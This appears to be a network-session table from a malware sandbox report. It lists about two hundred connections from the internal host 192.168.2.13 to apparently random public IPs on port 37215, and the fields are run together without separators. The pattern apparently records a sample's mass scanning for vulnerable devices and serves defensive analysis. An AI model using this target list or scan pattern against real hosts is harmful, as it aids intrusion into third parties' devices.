                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13338192.168.2.134213841.129.127.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13339192.168.2.134278617.87.59.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13340192.168.2.1340544197.228.2.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13341192.168.2.1357978197.149.59.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13342192.168.2.1345892157.70.216.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13343192.168.2.1338698157.156.149.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13344192.168.2.1334838157.72.233.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13345192.168.2.1336972197.34.160.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13346192.168.2.134948241.40.151.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13347192.168.2.134179297.185.148.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13348192.168.2.135221241.32.97.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13349192.168.2.135392641.27.166.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13350192.168.2.1346652157.252.6.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13351192.168.2.1351040157.173.68.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13352192.168.2.1348518136.61.60.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13353192.168.2.133646641.134.11.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13354192.168.2.134762241.44.172.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13355192.168.2.1359686157.123.245.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13356192.168.2.1359178157.41.238.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13357192.168.2.134348641.211.44.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13358192.168.2.134025059.254.192.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13359192.168.2.1336354197.85.108.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13360192.168.2.1346324197.144.214.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13361192.168.2.134699841.105.242.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13362192.168.2.135615041.87.189.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13363192.168.2.1348870157.254.17.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13364192.168.2.136077881.243.98.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13365192.168.2.1359938157.246.54.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13366192.168.2.1350474166.181.17.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13367192.168.2.135724041.115.205.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13368192.168.2.134362241.117.81.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13369192.168.2.1356044157.33.147.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13370192.168.2.133783041.152.183.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13371192.168.2.1341394197.26.31.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13372192.168.2.1350446197.110.202.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13373192.168.2.134524441.244.130.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13374192.168.2.133814241.124.12.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13375192.168.2.133759840.204.239.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13376192.168.2.1338520197.133.30.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13377192.168.2.1350304157.172.6.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13378192.168.2.1338380157.254.77.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13379192.168.2.1344060197.205.18.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13380192.168.2.134351841.76.209.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13381192.168.2.1357590197.109.106.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13382192.168.2.136004041.247.139.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13383192.168.2.1358980157.194.14.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13384192.168.2.1357812157.253.47.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13385192.168.2.1360288197.100.108.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13386192.168.2.1358740157.255.212.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13387192.168.2.1346330184.197.26.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13388192.168.2.134237838.247.200.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13389192.168.2.1360908157.125.47.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13390192.168.2.1343850197.81.214.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13391192.168.2.1335780157.20.219.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13392192.168.2.1335584157.115.241.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13393192.168.2.133444664.129.94.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13394192.168.2.1346756114.95.209.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13395192.168.2.1348166164.132.136.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13396192.168.2.1350136157.81.239.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13397192.168.2.1354884197.192.15.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13398192.168.2.1333966107.123.33.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13399192.168.2.1356556157.245.179.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13400192.168.2.1357934197.31.174.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13401192.168.2.1353176197.178.16.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13402192.168.2.1333212157.29.166.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13403192.168.2.135403441.128.157.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13404192.168.2.1333228196.47.203.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13405192.168.2.1350864157.16.218.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13406192.168.2.135073041.112.121.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13407192.168.2.135433241.87.158.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13408192.168.2.1338534197.77.207.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13409192.168.2.1340420157.47.23.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13410192.168.2.1354750197.8.13.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13411192.168.2.133388493.124.18.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13412192.168.2.133669041.211.68.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13413192.168.2.134606841.214.205.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13414192.168.2.1353842133.48.110.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13415192.168.2.1340436157.144.101.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13416192.168.2.1358034197.122.62.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13417192.168.2.1351702184.206.123.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13418192.168.2.1358234157.97.170.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13419192.168.2.1336736139.148.197.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13420192.168.2.135800241.14.84.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13421192.168.2.1353716197.119.108.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13422192.168.2.136018641.170.99.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13423192.168.2.1338848197.124.164.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13424192.168.2.135153841.79.73.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13425192.168.2.134217641.100.234.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13426192.168.2.1354158157.214.151.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13427192.168.2.135923241.15.84.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13428192.168.2.1351058216.244.170.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13429192.168.2.1343146197.72.14.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13430192.168.2.1334678197.107.61.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13431192.168.2.1347816173.127.58.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13432192.168.2.134743483.148.39.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13433192.168.2.1338796163.232.143.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13434192.168.2.1351748197.18.62.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13435192.168.2.135300463.153.43.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13436192.168.2.134438841.37.214.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13437192.168.2.133499439.198.62.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13438192.168.2.135758841.61.130.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13439192.168.2.1348672157.245.141.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13440192.168.2.1356996197.5.125.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13441192.168.2.133663427.119.108.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13442192.168.2.1344746157.179.74.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13443192.168.2.134869442.13.5.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13444192.168.2.1333462157.179.232.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13445192.168.2.1332864157.175.34.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13446192.168.2.1342590197.195.215.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13447192.168.2.135106641.225.178.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13448192.168.2.133371441.234.224.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13449192.168.2.1360804157.227.98.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13450192.168.2.1357532197.210.2.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13451192.168.2.1344054188.255.110.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13452192.168.2.1355768157.248.173.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13453192.168.2.1353110197.27.249.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13454192.168.2.1347852157.29.152.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13455192.168.2.1346170157.110.240.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13456192.168.2.1348672197.178.85.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13457192.168.2.1333206157.98.99.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13458192.168.2.133365041.16.23.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13459192.168.2.1359274157.65.247.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13460192.168.2.134587247.251.164.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13461192.168.2.1335268197.176.188.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13462192.168.2.1335702167.119.228.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13463192.168.2.133847641.219.29.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13464192.168.2.1352840157.198.238.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13465192.168.2.135517865.67.94.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13466192.168.2.135398641.205.47.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13467192.168.2.1357170197.185.117.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13468192.168.2.1352706157.170.69.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13469192.168.2.1347656157.190.211.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13470192.168.2.135456865.3.16.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13471192.168.2.135741642.27.139.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13472192.168.2.1336412197.254.129.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13473192.168.2.1341874157.25.131.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13474192.168.2.1338384157.138.46.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13475192.168.2.134387276.85.45.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13476192.168.2.134929441.150.186.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13477192.168.2.134223641.143.179.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13478192.168.2.1358428132.243.114.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13479192.168.2.135995641.213.221.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13480192.168.2.1354436170.205.69.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13481192.168.2.134426041.21.2.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13482192.168.2.133657641.118.194.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13483192.168.2.1334126197.110.203.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13484192.168.2.135462241.10.153.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13485192.168.2.1356314197.224.66.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13486192.168.2.1360932157.120.148.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13487192.168.2.1355260137.32.111.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13488192.168.2.1350562157.244.249.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13489192.168.2.135432041.83.143.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13490192.168.2.1350550157.222.1.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13491192.168.2.1359792197.181.40.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13492192.168.2.1341346197.29.204.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13493192.168.2.1340378197.76.99.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13494192.168.2.135030841.30.5.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13495192.168.2.135222241.66.27.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13496192.168.2.1360240112.58.3.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13497192.168.2.135354870.174.91.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13498192.168.2.1341036157.125.77.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13499192.168.2.1353024157.80.132.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13500192.168.2.134153841.175.51.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13501192.168.2.133748294.26.183.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13502192.168.2.1356676157.169.173.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13503192.168.2.1359370157.84.201.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13504192.168.2.1349204197.65.56.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13505192.168.2.1348160197.208.118.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13506192.168.2.134217041.211.125.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13507192.168.2.136007441.40.187.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13508192.168.2.133301296.195.87.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13509192.168.2.1356964197.235.79.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13510192.168.2.134261641.89.159.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13511192.168.2.1345802145.240.21.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13512192.168.2.1360824197.101.208.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13513192.168.2.1358246157.70.162.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13514192.168.2.1341068197.59.195.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13515192.168.2.1358874112.133.128.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13516192.168.2.1343660197.0.29.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13517192.168.2.134869817.96.253.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13518192.168.2.136063241.166.132.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13519192.168.2.1333490197.88.247.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13520192.168.2.134873241.193.214.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13521192.168.2.133277841.26.226.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13522192.168.2.135424449.186.219.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13523192.168.2.1358892197.61.72.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13524192.168.2.1360452197.248.225.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13525192.168.2.1342974157.101.47.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13526192.168.2.1354266157.12.154.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13527192.168.2.134871241.68.10.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13528192.168.2.1349038197.153.194.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13529192.168.2.1355268195.184.94.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13530192.168.2.135816841.47.57.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13531192.168.2.1334198197.233.59.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13532192.168.2.1350688157.240.176.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13533192.168.2.135948257.50.237.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13534192.168.2.134934641.68.243.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13535192.168.2.1342632175.117.140.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13536192.168.2.1343334157.70.134.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13537192.168.2.135029241.17.102.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13538192.168.2.1340062157.92.129.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13539192.168.2.133499654.122.45.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13540192.168.2.1348698197.26.78.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13541192.168.2.1357586197.238.101.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13542192.168.2.1337558197.229.5.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13543192.168.2.1356596197.12.171.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13544192.168.2.1344516197.143.212.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13545192.168.2.1345804160.12.74.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13546192.168.2.1345404157.11.155.6837215
                                                  TimestampBytes transferredDirectionData


